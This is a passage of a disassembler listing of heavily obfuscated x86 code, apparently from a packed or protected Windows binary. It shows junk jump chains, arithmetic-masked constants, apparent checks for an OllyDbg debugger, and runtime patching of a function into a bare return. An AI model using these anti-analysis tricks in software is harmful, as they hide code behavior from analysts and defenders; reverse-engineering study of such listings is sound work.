loc_457DFF: ; CODE XREF: sub_439BF8:loc_43CCDBj
jmp loc_4577DB
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_457E04: ; DATA XREF: sub_442872o
jb loc_45709A
push edx
push ebp
pop edx
call sub_43CD4E
; START OF FUNCTION CHUNK FOR sub_43D021
loc_457E12: ; CODE XREF: sub_43D021+1DB86j
jbe loc_4597AA
loc_457E18: ; CODE XREF: sub_43D021:loc_44AF09j
push 8A3D3212h
pop eax
sub eax, 0DAA85F22h
add eax, 2E49C6A9h
add eax, ebp
add eax, 222163ACh
cmp dword ptr [eax], 4742444Fh
jmp loc_43B61C
; END OF FUNCTION CHUNK FOR sub_43D021
; =============== S U B R O U T I N E =======================================
sub_457E3D proc near ; CODE XREF: sub_44697F-2A57j
; sub_44C7DFp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044360F SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00446735 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C298 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004530B8 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
push edx
mov edx, ecx
jmp loc_44C298
sub_457E3D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445416
loc_457E49: ; CODE XREF: sub_445416+1j
mov eax, ebp
xchg eax, [esp+4+var_4]
mov ebp, esp
push ecx
push offset sub_44EBA8
jmp nullsub_314
; END OF FUNCTION CHUNK FOR sub_445416
; ---------------------------------------------------------------------------
loc_457E5B: ; CODE XREF: ut7h7i2x:0043DC57j
jnb loc_451868
; =============== S U B R O U T I N E =======================================
sub_457E61 proc near ; CODE XREF: sub_44D5BE+9E3Ap
; FUNCTION CHUNK AT 0045266E SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
call sub_43AA94
mov ds:off_41D140, eax
lea eax, sub_441DBB
mov byte ptr [eax], 0C3h
jmp loc_45266E
sub_457E61 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_457E7E: ; CODE XREF: sub_446F9A:loc_453E99j
; sub_446F9A+CF10j
add eax, 0ABD11E58h
xchg eax, [esp+0]
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
dd 43A30168h, 49BEE900h
db 0FEh, 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A90F
loc_457E96: ; CODE XREF: sub_43A90F:loc_442EBDj
push ecx
mov esp, ebp
push offset loc_4456FC
jmp nullsub_315
; END OF FUNCTION CHUNK FOR sub_43A90F
; ---------------------------------------------------------------------------
loc_457EA3: ; CODE XREF: ut7h7i2x:0044F0EBj
pop ecx
xor edx, edx
call sub_446CA0
loc_457EAB: ; CODE XREF: ut7h7i2x:00441A00j
jmp nullsub_78
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_395. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_457EB1: ; CODE XREF: sub_44D1F0-E65j
jmp loc_43CDD3
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_457EB6: ; CODE XREF: sub_4464B7-12B4j
jmp loc_44EFDE
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_457EBB: ; CODE XREF: sub_4433C5-36C3j
jmp loc_45A344
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
loc_457EC0: ; CODE XREF: ut7h7i2x:00449998j
jnb loc_44A5C3
cmp edi, 5E02F682h
jmp loc_440734
; ---------------------------------------------------------------------------
jle loc_455C85
push 0C4F92B19h
jmp sub_4406F1
; ---------------------------------------------------------------------------
mov edx, ebx
push ebp
jmp sub_450A55
; ---------------------------------------------------------------------------
locret_457EE9: ; CODE XREF: ut7h7i2x:0045A6BAj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444D26
loc_457EEA: ; CODE XREF: sub_444D26+EED6j
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_444D26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447167
loc_457EEF: ; CODE XREF: sub_447167+19j
jmp loc_43B916
; END OF FUNCTION CHUNK FOR sub_447167
; =============== S U B R O U T I N E =======================================
sub_457EF4 proc near ; CODE XREF: sub_43DDEF+4p
; sub_442B3B:loc_4582E5j ...
xchg edi, [esp+0]
push edi
pop edx
pop edi
jmp loc_43B617
sub_457EF4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_457EFF: ; CODE XREF: sub_455060:loc_43CD49j
xor edi, 69B8C6ACh
ja loc_43CF1F
pop ecx
rol ebp, 17h
jmp loc_44B519
; END OF FUNCTION CHUNK FOR sub_455060
; =============== S U B R O U T I N E =======================================
sub_457F14 proc near ; CODE XREF: sub_446599:loc_439CC6p
; ut7h7i2x:0044BEB6j
xchg edx, [esp+0]
pop edx
add edi, 2B6A9C95h
add eax, edi
pop edi
push offset loc_44F376
jmp loc_43BA65
sub_457F14 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_457F2B: ; CODE XREF: ut7h7i2x:0043F33Cj
xchg ebx, ebp
; =============== S U B R O U T I N E =======================================
sub_457F2D proc near ; CODE XREF: ut7h7i2x:loc_43A8A8p
; FUNCTION CHUNK AT 0043F656 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004512AD SIZE 00000015 BYTES
xchg edi, [esp+0]
pop edi
push ebp
push edx
pop ebp
xchg ebp, [esp+0]
call sub_4508DB
jmp loc_43F656
sub_457F2D endp
; ---------------------------------------------------------------------------
locret_457F41: ; CODE XREF: ut7h7i2x:loc_4504E1j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_457F42: ; CODE XREF: sub_444EAA+DFF9j
jmp loc_458F27
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_457F47: ; CODE XREF: ut7h7i2x:0043ECD6j
pop eax
or eax, 73027AF5h
add eax, 6A94CE3Ch
add eax, ebp
push offset sub_449AD9
jmp loc_454434
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_457F60: ; CODE XREF: sub_43CAF4:loc_43EEDAj
jz loc_43A299
jmp loc_45AAA6
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_457F6B: ; CODE XREF: sub_4529E0+8388j
push 0EDD80DAh
pop ecx
or ecx, 844B07F7h
and ecx, 8FC8344Eh
xor ecx, 6AD7554Dh
add eax, ecx
jmp loc_452482
; END OF FUNCTION CHUNK FOR sub_4529E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_457F8A: ; CODE XREF: sub_45A79F:loc_43C2B1j
test ebx, edi
jmp loc_43EE6E
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
loc_457F91: ; CODE XREF: ut7h7i2x:0043E6ADj
adc ecx, 23149DABh
jmp loc_43D457
; ---------------------------------------------------------------------------
xor ebp, esi
xchg ebx, edi
jmp sub_441FE1
; ---------------------------------------------------------------------------
jmp ds:dword_41D17C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_457FAB: ; CODE XREF: sub_44B789+F219j
jmp loc_44121E
; END OF FUNCTION CHUNK FOR sub_44B789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
db 85h, 19h, 0FCh
dd 8B5AFFFEh, 0E8522404h, 0FFFF6875h, 0FEB0F8E9h, 0D2810FFFh
dd 0E9000023h, 0FFFF6C41h
; =============== S U B R O U T I N E =======================================
sub_457FD0 proc near ; DATA XREF: sub_45A2AD+9o
; FUNCTION CHUNK AT 00445CFA SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00459F8D SIZE 00000005 BYTES
add esp, 0FFFFFFF8h
call sub_439C85
loc_457FD8: ; CODE XREF: ut7h7i2x:0044E733j
jmp loc_445CFA
sub_457FD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_457FDD proc near ; CODE XREF: sub_43C39B+10233j
push ebx
push 0F4E0D1Ah
pop ebx
and ebx, 223576Eh
or ebx, 52CAD12Eh
xor ebx, 3079B45Ch
add ebx, 9D90D815h
call sub_44ADF9
loc_458001: ; CODE XREF: sub_44937E-5D8Ej
pop edi
jmp loc_441D28
sub_457FDD endp
; =============== S U B R O U T I N E =======================================
sub_458007 proc near ; CODE XREF: ut7h7i2x:004391EEp
; ut7h7i2x:0045194Aj
; FUNCTION CHUNK AT 0044097B SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
push edi
push offset sub_443BD9
jmp loc_44097B
sub_458007 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_458016: ; CODE XREF: ut7h7i2x:0043ADD5j
; sub_43F0B0+10E2Cj
or eax, 26B828CAh
xor eax, 79CC9AF7h
add eax, ebp
add eax, 0A18E18D4h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
loc_45802F: ; CODE XREF: ut7h7i2x:loc_44FB27j
jmp loc_43E498
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
loc_458034: ; CODE XREF: ut7h7i2x:0044A513j
and esi, ecx
rol ebx, 12h
or esi, 3A763919h
; START OF FUNCTION CHUNK FOR sub_457A66
loc_45803F: ; CODE XREF: sub_457A66:loc_447D26j
; ut7h7i2x:loc_44A506j
sub edi, 0D3DBECB5h
add edi, 3CCC5AEFh
xchg edi, [esp+0Ch+var_C]
jmp loc_454DD5
; END OF FUNCTION CHUNK FOR sub_457A66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_458054 proc near ; DATA XREF: sub_43B873+AC81o
; FUNCTION CHUNK AT 0043D573 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447286 SIZE 00000005 BYTES
push edx
call sub_44C273
push 90F487F5h
pop eax
sub eax, 0F506A65Eh
xor eax, 40516E0Bh
add eax, 96B3349Eh
jmp loc_43D573
sub_458054 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_345. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CAF4
loc_458078: ; CODE XREF: sub_43CAF4:loc_4530F4j
jmp nullsub_498
; END OF FUNCTION CHUNK FOR sub_43CAF4
; ---------------------------------------------------------------------------
xor edx, eax
jmp loc_45A8BF
; ---------------------------------------------------------------------------
loc_458084: ; DATA XREF: ut7h7i2x:0044423Ao
cmp dword ptr [ebp-4], 0
jz loc_44B4CE
jmp loc_448C94
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_458094: ; CODE XREF: sub_450651-23F5j
jmp loc_453838
; END OF FUNCTION CHUNK FOR sub_450651
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_458099: ; CODE XREF: sub_4544E6:loc_453085j
jz loc_458445
jmp loc_439275
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441DBB
loc_4580A4: ; CODE XREF: sub_441DBB:loc_441DC0j
; sub_455145:loc_452495j
add esi, 498438Eh
popf
xchg esi, [esp-4+arg_0]
jmp nullsub_4
; END OF FUNCTION CHUNK FOR sub_441DBB
; =============== S U B R O U T I N E =======================================
sub_4580B3 proc near ; DATA XREF: sub_4558D7+6o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044664C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F35E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045093E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450DF5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045ACCA SIZE 00000012 BYTES
or eax, eax
jnz loc_450DF5
jmp loc_44664C
sub_4580B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_4580C0: ; CODE XREF: sub_44092D-21FCj
rol eax, 12h
push eax
retn
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44081E
loc_4580C5: ; CODE XREF: sub_44081E+1717Dj
jmp nullsub_320
; END OF FUNCTION CHUNK FOR sub_44081E
; ---------------------------------------------------------------------------
loc_4580CA: ; CODE XREF: ut7h7i2x:00443018j
jmp loc_44432A
; =============== S U B R O U T I N E =======================================
sub_4580CF proc near ; CODE XREF: ut7h7i2x:0044FE47p
; ut7h7i2x:loc_451849p
; FUNCTION CHUNK AT 00441E96 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A69A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B846 SIZE 00000005 BYTES
push ebp
jmp loc_44A69A
sub_4580CF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_4580D5: ; CODE XREF: sub_43CE34-12BAj
jnz loc_44613D
jmp loc_454D5B
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_4580E0: ; CODE XREF: sub_439701:loc_454EA4j
xchg esi, [esp-0Ch+arg_8]
jmp loc_44B317
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4580E8: ; CODE XREF: sub_450FDE:loc_454568j
jz loc_4447A5
jmp loc_455C1A
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445188
loc_4580F3: ; CODE XREF: sub_445188+286Dj
jp loc_444336
xchg eax, [ebx]
shl esi, 10h
cmp ecx, 60C24CEh
jmp loc_44E81D
; END OF FUNCTION CHUNK FOR sub_445188
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456CBD
loc_458109: ; CODE XREF: sub_456CBD-1956Aj
mov ebp, [edx]
jmp loc_450047
; END OF FUNCTION CHUNK FOR sub_456CBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_458110: ; CODE XREF: sub_447EB5:loc_458887j
jl loc_4491C1
adc edx, 9B92A7DAh
jmp loc_4491B5
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
xchg ebp, ebx
jmp sub_440F8E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4492A1
loc_458128: ; CODE XREF: sub_4492A1-4C82j
ja loc_44FA39
; END OF FUNCTION CHUNK FOR sub_4492A1
; =============== S U B R O U T I N E =======================================
sub_45812E proc near ; CODE XREF: sub_4492A1:loc_44A453j
; FUNCTION CHUNK AT 00441061 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446F7C SIZE 0000000E BYTES
push ebx
push 0D32100C6h
pop ebx
sub ebx, 4A520CCEh
xor ebx, 0FD68715Ah
rol ebx, 6
xor ebx, 53E30441h
jmp loc_446F7C
sub_45812E endp
; ---------------------------------------------------------------------------
mov edx, 1AE260E8h
call sub_44ED9F
push eax
ror eax, 11h
call sub_4548DE
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_458162: ; CODE XREF: sub_442B3B+140C5j
jmp loc_44A1D6
; END OF FUNCTION CHUNK FOR sub_442B3B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_394. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D2FA
loc_458168: ; CODE XREF: sub_44D2FA+Aj
jmp loc_4526D3
; END OF FUNCTION CHUNK FOR sub_44D2FA
; =============== S U B R O U T I N E =======================================
sub_45816D proc near ; DATA XREF: sub_44D683:loc_4469CDo
xchg esi, [esp+0]
jmp sub_43AA94
sub_45816D endp
; ---------------------------------------------------------------------------
loc_458175: ; CODE XREF: ut7h7i2x:0044B05Bj
mov esi, edx
xchg esi, [esp]
call sub_44B5CF
push 5B414A53h
pop eax
sub eax, ds:4000F6h
add eax, 4279F1F9h
loc_458191: ; CODE XREF: ut7h7i2x:loc_4570E2j
rol eax, 0Bh
jmp loc_44EFBA
; ---------------------------------------------------------------------------
loc_458199: ; CODE XREF: ut7h7i2x:00440740j
js loc_458C1B
cmp ebx, 0D055D9B7h
jmp loc_456AB6
; ---------------------------------------------------------------------------
loc_4581AA: ; DATA XREF: sub_458BED+3o
xchg ebp, [esp]
push esi
push offset sub_43B9C8
jmp locret_458A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_4581B8: ; CODE XREF: sub_44FC60+1270j
mov [ebp-24h], eax
mov eax, [ebp-24h]
call sub_44EEAA
loc_4581C3: ; CODE XREF: ut7h7i2x:00451CD5j
; sub_43AA94:loc_45AE2Bj
and ecx, 1BC842B3h
call sub_44101A
loc_4581CE: ; CODE XREF: sub_43B847+14EAEj
jmp loc_43B49B
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4581D3: ; CODE XREF: sub_457A66:loc_450D6Ej
; DATA XREF: sub_44064B-6360o
or eax, 10h
mov edx, [ebp+arg_0]
mov [edx-8], eax
jmp loc_45246C
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_4581E1: ; CODE XREF: sub_44064B-C36j
cmp dword ptr [ebp-10h], 2
push offset loc_44BD5E
loc_4581EA: ; CODE XREF: ut7h7i2x:loc_44E1EEj
jmp nullsub_323
; END OF FUNCTION CHUNK FOR sub_44064B
; =============== S U B R O U T I N E =======================================
sub_4581EF proc near ; DATA XREF: sub_43C0DA-280o
add eax, ebp
add eax, 65F2171Dh
mov eax, [eax]
push ecx
mov ecx, eax
push offset sub_43F7C8
jmp nullsub_428
sub_4581EF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_458206: ; CODE XREF: sub_439BF8:loc_449F18j
add edi, ebp
add edi, 513464CDh
mov [edi], edx
pop edi
pushf
push 0B11A47Ch
jmp loc_459EDF
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E13
loc_45821C: ; CODE XREF: sub_445E13+FE5Bj
push edx
push 0E2458405h
pop edx
or edx, 0EEA6F7FDh
sub edx, 4622DC2Bh
add edx, 57802871h
xchg edx, [esp+4+var_4]
jmp loc_44D22B
; END OF FUNCTION CHUNK FOR sub_445E13
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45823D: ; CODE XREF: sub_43DBEC+Bj
pop edi
push 0B578B105h
pop eax
or eax, 75D5DAC7h
rol eax, 7
or eax, 87317C8h
jmp loc_444B0A
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_458258: ; CODE XREF: ut7h7i2x:0043C044j
mov ebx, edi
mov edx, 0BD0034DAh
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_45825F: ; CODE XREF: sub_452CBB:loc_43C034j
xor edx, 19FCDF2h
add edx, 0E41BD371h
push offset loc_4507E1
jmp nullsub_366
; END OF FUNCTION CHUNK FOR sub_452CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A907
loc_458275: ; CODE XREF: sub_45A907:loc_43CDB0j
push edx
push 3C3B7A6Bh
pop edx
rol edx, 1Eh
add edx, 3136A3F3h
xchg edx, [esp+4+var_4]
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_45A907
; ---------------------------------------------------------------------------
push edi
jmp loc_44262E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_458293: ; CODE XREF: sub_444851:loc_44C024j
test ecx, 0C7FDC2B8h
jmp loc_441E09
; END OF FUNCTION CHUNK FOR sub_444851
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_526. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459BF0
loc_45829F: ; CODE XREF: sub_459BF0-1E15Dj
jmp sub_44F712
; END OF FUNCTION CHUNK FOR sub_459BF0
; ---------------------------------------------------------------------------
loc_4582A4: ; DATA XREF: sub_45A599-1AEDCo
push 6AE230F2h
pop edi
rol edi, 14h
add edi, 0C50C09C3h
jmp loc_442B52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_292. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_4582B9: ; CODE XREF: sub_4518D7+64BAj
jmp loc_43B1BC
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BD1
loc_4582BE: ; CODE XREF: ut7h7i2x:0044029Ej
; sub_439BD1+155FCj
jmp loc_44DD6E
; END OF FUNCTION CHUNK FOR sub_439BD1
; ---------------------------------------------------------------------------
loc_4582C3: ; CODE XREF: ut7h7i2x:00447057j
jmp locret_451A32
; =============== S U B R O U T I N E =======================================
sub_4582C8 proc near ; CODE XREF: sub_43FF65+17049j
push ebp
push offset loc_444B6E
jmp nullsub_325
sub_4582C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455CF9
loc_4582D3: ; CODE XREF: sub_455CF9:loc_43FDF4j
xor eax, esi
pop esi
rol eax, 9
loc_4582D9: ; CODE XREF: sub_441765:loc_439DDBj
push edx
jmp loc_445846
; END OF FUNCTION CHUNK FOR sub_455CF9
; ---------------------------------------------------------------------------
loc_4582DF: ; CODE XREF: ut7h7i2x:loc_44F666j
jl loc_44DDBB
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_4582E5: ; CODE XREF: sub_442B3B+E1A3j
jmp sub_457EF4
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4490E0
loc_4582EA: ; CODE XREF: sub_4490E0+1Aj
jmp loc_43AB1C
; END OF FUNCTION CHUNK FOR sub_4490E0
; ---------------------------------------------------------------------------
adc ecx, ebx
jmp loc_4436CA
; ---------------------------------------------------------------------------
loc_4582F6: ; CODE XREF: ut7h7i2x:004427F6j
call sub_449D60
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_4582FB: ; CODE XREF: sub_43AA94+130A5j
jmp loc_44AB6F
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_458300: ; CODE XREF: sub_43AB62+6EF8j
shl eax, 1Ah
jb loc_4496A2
jmp loc_450227
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_45830E: ; CODE XREF: sub_44941C-FF0Fj
jp loc_440EC3
jmp loc_43B160
; END OF FUNCTION CHUNK FOR sub_44941C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_45831A: ; CODE XREF: sub_452B14-6B13j
jnz sub_455D84
loc_458320: ; CODE XREF: sub_452B14:loc_442379j
add ebx, ds:4000F9h
xor ebx, 0EDABBC85h
xchg ebx, [esp+0]
push ebx
pushf
jmp loc_45050D
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_458336: ; CODE XREF: ut7h7i2x:00439A79j
ror eax, 6
push esi
push 0D7BD6E60h
pop esi
jmp loc_443E22
; =============== S U B R O U T I N E =======================================
sub_458345 proc near ; CODE XREF: sub_439AFD+15p
; ut7h7i2x:004554D5j
; FUNCTION CHUNK AT 0043DB80 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043E576 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440F23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044601C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446986 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A108 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044A7CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AED5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044D385 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004511F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457D22 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 32ECA955h
add eax, ebp
add eax, 6C7F8124h
cmp dword ptr [eax], 4742444Fh
jmp loc_43E576
sub_458345 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_458362 proc near ; CODE XREF: sub_43A513-1A5p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0044AAB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A5F0 SIZE 00000014 BYTES
push ebp
mov ebp, esp
loc_458365: ; CODE XREF: ut7h7i2x:loc_43D436j
add esp, 0FFFFFFF4h
mov [ebp+var_4], eax
jmp loc_44AAB3
sub_458362 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_458370: ; CODE XREF: sub_446258:loc_45AA8Cj
jz loc_456EB1
jmp loc_43B279
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_45837B: ; CODE XREF: ut7h7i2x:0045526Fj
add edi, 61A9C4DEh
xchg edi, [esp]
jmp sub_454196
; =============== S U B R O U T I N E =======================================
sub_458389 proc near ; CODE XREF: sub_447EB5-4F53p
; ut7h7i2x:00448E48j
; FUNCTION CHUNK AT 0044B6D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455073 SIZE 0000000A BYTES
xchg edi, [esp+0]
pop edi
push 0CF1E2499h
pop esi
or esi, 0F8511B1Ah
add esi, 0E57EA0h
jmp loc_44B6D6
sub_458389 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg edi, eax
jmp sub_443A06
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45292B
loc_4583AB: ; CODE XREF: sub_45292B-E68Ej
ja loc_43D05F
mov [esi], ecx
ror eax, 1Eh
rol ecx, 11h
jmp loc_457512
; END OF FUNCTION CHUNK FOR sub_45292B
; ---------------------------------------------------------------------------
loc_4583BE: ; CODE XREF: ut7h7i2x:0043A0FDj
jb loc_447726
; =============== S U B R O U T I N E =======================================
sub_4583C4 proc near ; CODE XREF: ut7h7i2x:00453CEDp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B787 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043EE63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E5D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451F2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045652B SIZE 00000014 BYTES
xchg edx, [esp+4+var_4]
pop edx
or edx, edx
jnz loc_43B787
jmp loc_43EE63
sub_4583C4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CD2
loc_4583D5: ; CODE XREF: sub_458CD2-2853j
jle loc_444535
mov ebp, 6BE2700Ah
jmp loc_444C5F
; END OF FUNCTION CHUNK FOR sub_458CD2
; ---------------------------------------------------------------------------
loc_4583E5: ; CODE XREF: ut7h7i2x:0045AB35j
adc edi, edx
; =============== S U B R O U T I N E =======================================
sub_4583E7 proc near ; CODE XREF: ut7h7i2x:00446B9Bp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043F34C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F92C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440F4D SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004449F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A385 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C102 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458CFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A34F SIZE 0000000E BYTES
xchg ebx, [esp+0]
pop ebx
and edx, ebx
js loc_44C102
shl eax, 8
sub ecx, eax
jmp loc_4449F4
sub_4583E7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_4583FD: ; CODE XREF: sub_454B2B:loc_43F825j
jnz loc_45025D
jmp loc_43BCFF
; END OF FUNCTION CHUNK FOR sub_454B2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_354. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_458409: ; CODE XREF: sub_455060-547Dj
jmp loc_459A53
; END OF FUNCTION CHUNK FOR sub_455060
